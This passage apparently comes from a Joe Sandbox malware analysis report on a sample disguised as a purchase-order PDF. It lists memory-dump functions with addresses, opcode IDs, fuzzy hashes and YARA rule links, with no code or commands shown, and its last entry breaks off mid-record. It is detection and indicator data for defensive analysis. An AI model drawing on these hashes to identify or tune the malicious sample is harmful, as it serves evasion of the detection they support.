                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: E
                                                          • API String ID: 0-3568589458
                                                          • Opcode ID: 0c5ebba361d8ff43942522e40fef45bf641b5f48c8c3395111635146aa60ba94
                                                          • Instruction ID: 29ce6db8fcb902f271d2ef84a7d3c5940f64330fff84c76dd71cd27279e55796
                                                          • Opcode Fuzzy Hash: 0c5ebba361d8ff43942522e40fef45bf641b5f48c8c3395111635146aa60ba94
                                                          • Instruction Fuzzy Hash: FE11B7B4A44129CFDB64DF24C8886D9B7F5FB4A300F2081D69559A7684DB34DFC58F40
                                                          Function 010BF678 Relevance: .3, Instructions: 343COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 302f83aca13bbce1fd1efa257d15956d262620c3e26e85d90bef778302910d8a
                                                          • Instruction ID: abe77e6f70f0068c39a7d00288743743c4c35422389ee022fc47b2b6b78e208e
                                                          • Opcode Fuzzy Hash: 302f83aca13bbce1fd1efa257d15956d262620c3e26e85d90bef778302910d8a
                                                          • Instruction Fuzzy Hash: 89B1E2323042129FEB59DF69D890AAE7BE6EFC4710B1441AAE945CB391CF35DC02C7A0
                                                          Function 0752BA18 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78e9aa019c400c7d8c29b0d18c0b9ef4a6910512b7240ea4637cb728b68e1126
                                                          • Instruction ID: ce9afb98243e86d3cbd5a336c4cf93429c2334758f8ce8824808eeb1cd55f3a5
                                                          • Opcode Fuzzy Hash: 78e9aa019c400c7d8c29b0d18c0b9ef4a6910512b7240ea4637cb728b68e1126
                                                          • Instruction Fuzzy Hash: 477108B4E00229CFDB44DFA4D4886EDBBB2FB4A314F104429D516AB394EB345D46DF51
                                                          Function 010B0C50 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b943425f0d00262b59d700563bee71e5490c4d80c3a692a9285ec1f8a714c296
                                                          • Instruction ID: d6eed29992c5195feeb288d46d9cb78d255b1875cc530015f3b77148f0e18075
                                                          • Opcode Fuzzy Hash: b943425f0d00262b59d700563bee71e5490c4d80c3a692a9285ec1f8a714c296
                                                          • Instruction Fuzzy Hash: A1419F30E00219CFCB55EBA8C0806EDBBF1FF88320F148169E455EB294DB35AD41CBA1
                                                          Function 010B0870 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bf6b817a4471f82ddc8044f2f15f7335797902012eeffff2aa00c12a0b0020b
                                                          • Instruction ID: 6b144bc3083e048aa45a01f9019a4a18a750a2b0918b0d92422c912a25ae629f
                                                          • Opcode Fuzzy Hash: 9bf6b817a4471f82ddc8044f2f15f7335797902012eeffff2aa00c12a0b0020b
                                                          • Instruction Fuzzy Hash: 9631A431E0020A8FCB04DFB8C8459EEBBF1EF89310F558695E545AB251E771A986CB90
                                                          Function 010B99D9 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0ff83aeda90559a7722f29a04c032e4f38084497c64a7f8610d367700d220f0
                                                          • Instruction ID: b235cd17fc0c449a723ac1b1217a7fe58c5f8145e7200e78d3b6952199afb062
                                                          • Opcode Fuzzy Hash: e0ff83aeda90559a7722f29a04c032e4f38084497c64a7f8610d367700d220f0
                                                          • Instruction Fuzzy Hash: AC317CB4E05209DFDB00DFA9C1487EEBBF2EB86308F0081A5D254A7755CB785949CF91
                                                          Function 010B0B19 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9bdf90d25c70a1359ffe21d064899252c69800a95b3b4c352bec695efe6b27
                                                          • Instruction ID: 4873002f3941a1e558a3cd069c783d56f138b917d58fd69688bb841943193727
                                                          • Opcode Fuzzy Hash: eb9bdf90d25c70a1359ffe21d064899252c69800a95b3b4c352bec695efe6b27
                                                          • Instruction Fuzzy Hash: 5A319F71B00209DFCB11DFA9C8809DFFBF6EF89310B14816AE886A7355DB31AD458B90
                                                          Function 010B9E08 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 694a6da995906a61a2b226984b5028a498003e6ecdaaa87a45ad0e8a5dd5a46f
                                                          • Instruction ID: 1ec4d58f59e953c07a8b8eb2415b7f56614c99b35efb8ea6228ff63366d7c7d6
                                                          • Opcode Fuzzy Hash: 694a6da995906a61a2b226984b5028a498003e6ecdaaa87a45ad0e8a5dd5a46f
                                                          • Instruction Fuzzy Hash: 793112B1D00209DFCB00DFA9C4886DEBBF2FF49308F1484A6E655A7221DB759A85CF61
                                                          Function 010B15B4 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e520b932743c22d141c79609b75fc782f05161c2e2b3d56badd1dbe7598ae9a
                                                          • Instruction ID: 6781ad25f1ae9378f85da812509eda75227261e6fe84046cde5f249953533982
                                                          • Opcode Fuzzy Hash: 8e520b932743c22d141c79609b75fc782f05161c2e2b3d56badd1dbe7598ae9a
                                                          • Instruction Fuzzy Hash: 4E318870D01248DFDF10CFAAD594ADEBFF1AF48310F288069E549AB250DB749905CF90
                                                          Function 010B99E8 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cff499cc81404e91f35c0b22e462ae4e59e134e18034b17020ec858ccd55e5b9
                                                          • Instruction ID: 1ddfc67fa0bfa1e0bc7bfdada67eda403450ddacb405b9ae71a50186ede2e4bd
                                                          • Opcode Fuzzy Hash: cff499cc81404e91f35c0b22e462ae4e59e134e18034b17020ec858ccd55e5b9
                                                          • Instruction Fuzzy Hash: 0C3136B0E04209CFEB40DFA9C1887EEBBF2EB89308F4081A5C254A7745DB785949CF81
                                                          Function 010B15C0 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e93bf4b7e6b1c6454b12656452cbbab8649e17e8a700d202b957f1972bb79b39
                                                          • Instruction ID: 95764c3949f8fd74a2e335bc69f766baa3667d50545b6f85881db8a5462c679c
                                                          • Opcode Fuzzy Hash: e93bf4b7e6b1c6454b12656452cbbab8649e17e8a700d202b957f1972bb79b39
                                                          • Instruction Fuzzy Hash: 9C314670D012489FDF10CFAAD594ADEBFF5AF48310F248029E949AB250DB749945CF90
                                                          Function 010B9E18 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cdc0b0afa4dc5d4ffdb2d531379da2ef5a928c26fb1e91ad759e4165d040f84
                                                          • Instruction ID: 301318ceab742989a17f42c4ce2ab66e8e52041b8cf866aafa1d28c63d505799
                                                          • Opcode Fuzzy Hash: 4cdc0b0afa4dc5d4ffdb2d531379da2ef5a928c26fb1e91ad759e4165d040f84
                                                          • Instruction Fuzzy Hash: 193122B0D00209DFCB00DFA9C4886EEBBF1FB89308F1484A5D625A7220DB759A84CF51
                                                          Function 010BD730 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22155aeb2831faf67d35a52046048002d98499f2f647ba03a7338d44ebd21ebe
                                                          • Instruction ID: 714bc0a788e59b05e734170136ce649365795cd61d06ef050f96774d77b2d383
                                                          • Opcode Fuzzy Hash: 22155aeb2831faf67d35a52046048002d98499f2f647ba03a7338d44ebd21ebe
                                                          • Instruction Fuzzy Hash: 522124B8E44209CFEB04DFE9C8847EEFAF2BB89305F108426C559A7244EB7949458B90
                                                          Function 0102D05C Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2198918106.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_102d000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f522489f85adb47b4edd97ede2e778f593dc8ad5fdd519114cbfc7af16ceeed
                                                          • Instruction ID: ea0dfd236e7574ab2d29fde998a0d882512f033ea0bcb9beba1abd6df02db002
                                                          • Opcode Fuzzy Hash: 7f522489f85adb47b4edd97ede2e778f593dc8ad5fdd519114cbfc7af16ceeed
                                                          • Instruction Fuzzy Hash: 86214976104240EFDB15DF54D9C0B2ABFA5FB84314F20C5ADE9490B252C33ADC4ACBA2
                                                          Function 010B0A20 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 258fecd654b4c442fdf96e64092b34cec6c71f04037b18796c93148c1ebbd981
                                                          • Instruction ID: 58516349d4c34452a57c238817cb2c2a57d5b5770c216bf70ca992f5a6b14279
                                                          • Opcode Fuzzy Hash: 258fecd654b4c442fdf96e64092b34cec6c71f04037b18796c93148c1ebbd981
                                                          • Instruction Fuzzy Hash: 3B21BE71A003198FDB25CF69C8449DEBBF1FF89320B104A6DE4D6EB295DB34A844CB60
                                                          Function 010B0860 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f65bb1a1061f80127cf26575130008a3666ebcb6a2491d0425e50202860e82d3
                                                          • Instruction ID: 314a06050883298f7e8ae06f01aaf25d75c0d5b97b389ab26dedd8410e581e3a
                                                          • Opcode Fuzzy Hash: f65bb1a1061f80127cf26575130008a3666ebcb6a2491d0425e50202860e82d3
                                                          • Instruction Fuzzy Hash: 02110774E002498FC744DFB8C495AAEBBF2EF49304F2584D8E985DB266D735D942CB80
                                                          Function 010BEAF0 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1946a0624d76e4ebfd7ebca62b6f99ebf7d503e21e330f66d2cb072184c2591f
                                                          • Instruction ID: 88cd96b75f6a719d13724967424bf22bbc8fbfd3881feb68d9788c33701f1db3
                                                          • Opcode Fuzzy Hash: 1946a0624d76e4ebfd7ebca62b6f99ebf7d503e21e330f66d2cb072184c2591f
                                                          • Instruction Fuzzy Hash: 6F112375D04209CFDF18CF9AD484AEEBBF6EF88310F14802AD606B3200D7755A44CBA5
                                                          Function 010B0CEA Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1748bf944fe5a1a517af66c50c69e46fb787db088fbdc24256d0fcff8a73570e
                                                          • Instruction ID: 33b151dcd9598bc684fdac73be03e0c1f339b2825dd90dc8ea64b3f15dc202c6
                                                          • Opcode Fuzzy Hash: 1748bf944fe5a1a517af66c50c69e46fb787db088fbdc24256d0fcff8a73570e
                                                          • Instruction Fuzzy Hash: 86210430A006188FCB15EBA9C180AEDF7F1EB48314F45C0AAE458AB295D775E880CF90
                                                          Function 0102D057 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2198918106.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_102d000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                          • Instruction ID: b6f0b9ff5cd00dae875ee31287c9d51f205d7ba9e5080f2ac024ac37ee72681f
                                                          • Opcode Fuzzy Hash: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                          • Instruction Fuzzy Hash: 2B11B176504280DFDB12CF54D9C4B16BFB2FB84314F2485A9D9490B656C33AD85ACBA2
                                                          Function 010B0A0F Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56241bb8a1d80dc0a925d0919ce5b84d7789112b3da09dbc7c27e0429ecd977c
                                                          • Instruction ID: ce4ca5406110eb336a78b3b128e65bb41aee13401290cc3c916da35231170e3e
                                                          • Opcode Fuzzy Hash: 56241bb8a1d80dc0a925d0919ce5b84d7789112b3da09dbc7c27e0429ecd977c
                                                          • Instruction Fuzzy Hash: 8D117C31A043189FDB64CF69C8449DABBF5EF49310B1485ADE485E7211DB31AD08CB60
                                                          Function 0752F210 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 988ff1f757bd56ddecd2a673fe486d525ff1bc324069e106951f977502168af0
                                                          • Instruction ID: bfd9eaf67369631addfe5774f8175b97ba55998e95824e6e482f48272f80a7a7
                                                          • Opcode Fuzzy Hash: 988ff1f757bd56ddecd2a673fe486d525ff1bc324069e106951f977502168af0
                                                          • Instruction Fuzzy Hash: 9B11F7B4E0021A9FDB48DFE9C8417AEBBF1FF88300F10856A9518A7345DA755A418B91
                                                          Function 0101D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2198873136.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_101d000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 425c982875640d34ca4d78de8bcedb31f5a938d73b9d72b3429987e89ca45ca6
                                                          • Instruction ID: 4ff5cefd73aa7a8edad4e050b8ba615e4e15f657cff658e5ed8385dfc5c75abe
                                                          • Opcode Fuzzy Hash: 425c982875640d34ca4d78de8bcedb31f5a938d73b9d72b3429987e89ca45ca6
                                                          • Instruction Fuzzy Hash: 9401F7714043409AE7124A69CD88B66BFD8EF413A4F08C05AFE884A18AC7BD9441C7B1
                                                          Function 010B0990 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fceb9b196dc0d63e0420866d373d7d7f48201fce90b3e03cbd2a065cc99b9690
                                                          • Instruction ID: ca74a44e925b24ba0d932a99e265342c4ec08536b771837c15c4afd335dd2b40
                                                          • Opcode Fuzzy Hash: fceb9b196dc0d63e0420866d373d7d7f48201fce90b3e03cbd2a065cc99b9690
                                                          • Instruction Fuzzy Hash: AF01283190034ADFDB159B60C8619EFBFF69F85310F01896AD082AB241DE741906C7D1
                                                          Function 0101D01C Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2198873136.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_101d000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4648f39d48631b4828f04b6a06e9bbf8050f9e513520e3a66bfbbd9dca9f6824
                                                          • Instruction ID: 25576e27dfe629ff0cc9d0b1f8699d4f7c4d67429e157849e0e86ba650e5fed5
                                                          • Opcode Fuzzy Hash: 4648f39d48631b4828f04b6a06e9bbf8050f9e513520e3a66bfbbd9dca9f6824
                                                          • Instruction Fuzzy Hash: 64F0C271405344AEE7118A19CDC8B62FFD8EB41674F18C15AFE884A286C379A841CBB1
                                                          Function 075138D5 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 654d415955f12bce05a5c14337806315f55ed0b9efc9b41a9ea11ecf0dd69517
                                                          • Instruction ID: 920299897d088a10ce1f6ce7fca22b1ca175b6a14ad6328123a59bc84340a007
                                                          • Opcode Fuzzy Hash: 654d415955f12bce05a5c14337806315f55ed0b9efc9b41a9ea11ecf0dd69517
                                                          • Instruction Fuzzy Hash: E711E8B8E04269CFCB64DF68D8986D9B7B1FB49304F1081DAE449A7748DB345EC48F41
                                                          Function 075174C5 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e6c024716f5c8a3c3ef108930eecccbedb2d33b6e80c3a16f669951354c551c
                                                          • Instruction ID: 97562060207cdf8d837701ae398e62accb8b887a57ca8d71d071f7427fc8c3ce
                                                          • Opcode Fuzzy Hash: 7e6c024716f5c8a3c3ef108930eecccbedb2d33b6e80c3a16f669951354c551c
                                                          • Instruction Fuzzy Hash: 2B012CB06502159FD768AF10D8A87AE77B2FF86215F1004D9914A7B684CF741E85CF11
                                                          Function 010B9F90 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 925d7fa317b25162050bbabb9cd805867e3b86a2b47839989cfa8125a0942dfb
                                                          • Instruction ID: 9a4f5b0a0f6e9d1d2c1d911125d3b60b3d7e5435580acce4710c64ae5bf0f3a6
                                                          • Opcode Fuzzy Hash: 925d7fa317b25162050bbabb9cd805867e3b86a2b47839989cfa8125a0942dfb
                                                          • Instruction Fuzzy Hash: 44F027B1E09281EFD322DF3484143E97FFA8703218F1400C9E18583242CBBB0B04C762
                                                          Function 0751252D Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf56f37b5b9197b343c9a56bbc6fa09b63e0768fc72534e360064549ce0dc24a
                                                          • Instruction ID: f3b52904cdaf41e433287058fbac0093de9567c33cf75dfc7fb1db25aa1516fa
                                                          • Opcode Fuzzy Hash: bf56f37b5b9197b343c9a56bbc6fa09b63e0768fc72534e360064549ce0dc24a
                                                          • Instruction Fuzzy Hash: 31F01DB0A102159FC768AF50D86879E77B2FFC6214F100498E14ABB684CF751E88CF11
                                                          Function 010BE8B8 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: babdae9a5a14469c1cf5fc3143cf27d7a908b729399268eb70c2a4915e1cf1f4
                                                          • Instruction ID: a1f8856a983c088079203b1d31f14c9a718beb05df1a62991e70e193ca233034
                                                          • Opcode Fuzzy Hash: babdae9a5a14469c1cf5fc3143cf27d7a908b729399268eb70c2a4915e1cf1f4
                                                          • Instruction Fuzzy Hash: 65F0A575D04208EFDB94DFA9D940ADCBBF5EB48300F10C1AA9958A3350D6769A51DF40
                                                          Function 0752D6C8 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction ID: 030dadafaa1104f0593d3b53ad62253b3ee4d9ba80ce60a9645247c8d25231d1
                                                          • Opcode Fuzzy Hash: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction Fuzzy Hash: 7DE0EDB4E04208EFCB54DFA9D440A9CFBF4FB49300F10C1AAD81893340D676AA52DF44
                                                          Function 0752A148 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction ID: 2f23e5046eb362bcbc8cdcd1a1dc2389674c51d381f7ce961989c7870c423bee
                                                          • Opcode Fuzzy Hash: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction Fuzzy Hash: AAE0C9B4E04208EFDB54DFA9D440A9DBBF4FB89310F10C1AA9C1893340D7769A52DF80
                                                          Function 0752B9C8 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction ID: 1a9e155c91a811c20ebb2597add47e50d100c8aed90e9e6f57434793a7b121ff
